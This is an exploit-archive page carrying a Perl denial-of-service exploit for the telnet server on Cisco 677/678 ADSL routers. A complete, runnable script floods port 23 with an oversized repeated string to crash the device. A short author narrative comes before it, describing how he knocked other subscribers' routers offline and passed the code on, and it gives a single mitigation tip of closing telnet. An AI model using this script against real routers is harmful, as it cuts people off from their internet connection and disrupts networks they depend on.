what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cisco677.pl

cisco677.pl
Posted May 5, 2002
Authored by DNV | Site mail.dhbit.ca

Cisco 677/678 Telnet Overflow denial of service perl exploit.

tags | exploit, denial of service, overflow, perl
systems | cisco
SHA-256 | cb4e9ab3984d7182248fb779619975b9ac913a2df54b7cecd9ca0a65b3f66fe9

cisco677.pl

Change Mirror Download

Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
put public on www.deadmeat.dk on 5-5-2002.
Thanks to all from DKW-stuff for testing.

A warm night i was coding and lisen to some tecno music trying to
overflow my BSD mashine.
But then I put the wrong IP into my scrip my ADSL router lost the
Internet connection.
So I start wonder why? and start looking into the code...
I found out that i have overflowed the telnet server
in my adsl router. After that I got online and start chatting
with others with same ISP and same Cisco ADSL-router...
and there route died too then i use there IP.
So I send the code to a friend and ask him to do the same...
On every router with the Telnet server open the router's
ping time got really high
and some of them died and have to be powercycle.
Please note: So fare cisco and the ISP have not done anything
about this problem...

To test it: try with the LAN_IP and WAN_IP it works best on LAN_IP side ;)
the protection is: close your Telnet server in the router.
Thats All!

-DNV Email: dnv[at]dhbit.ca

Here is the code:
running:
perl cisco677.pl -s [IP on Ciscorouter]

--------------------cisco677.pl------------------
#!/usr/bin/perl

# close your Cisco 677 up on the Telnet server!
# Made for fun only! port 23 is the Telnet server port on the router
# By DNV THX to DKW-stuff
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}
------------------------------------------------------


------------------------------------------------
This mail sent from DHBiT - http://mail.dhbit.ca
Come get your free, secure 5MB mailbox today!
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close